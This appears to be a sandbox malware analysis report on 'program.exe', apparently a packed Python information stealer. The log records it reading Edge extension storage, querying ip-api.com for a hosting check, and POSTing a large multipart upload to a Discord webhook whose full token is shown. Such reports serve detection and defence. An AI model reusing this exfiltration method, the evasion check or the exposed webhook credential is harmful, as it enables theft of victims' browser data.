              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7509280 FindFirstFileExW,FindClose,1_2_00007FF6B7509280
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6B75083C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,83_2_00007FF64FE746EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEB88E0 FindFirstFileExA,83_2_00007FF64FEB88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,83_2_00007FF64FE6E21C
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 766741User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=759108746665450e003c83e6b292e39f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 10:22:43 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731838964x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kw%2FMCC3nxYl1Sb3abNC0WpO%2FFrUHsOgYiaVPTDATc2ZXBunk234OqISsKrlIBESZZz3Fw35sEraQjNMdFhDGCmXh9SjSXz4cgxjnZha1bFkdj228QxWzxWkoww2m"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7f3eb00f74a25652e1281dc04aa6cdbfe83e4455-1731838963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=ffpl7Z_XRbw2jJzUSb94O3lzwZOtlB08ocIN8D03Ggs-1731838963322-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e3f004c2e334678-DFW
              Source: program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: program.exe, 00000001.00000003.1754035626.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: program.exe, 00000001.00000003.1851814782.000001B5FE386000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2109732740.000001B5FEE1E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850937625.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103020652.000001B5FEE1E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002700653.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3B0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104079256.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1852643951.000001B5FE39C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1852439273.000001B5FE38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: program.exe, 00000001.00000002.2105759928.000001B5FDE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: program.exe, 00000001.00000003.1850937625.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002700653.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: program.exe, 00000001.00000002.2105991946.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000008.00000002.1906355908.000001A84B996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1FA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B374D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
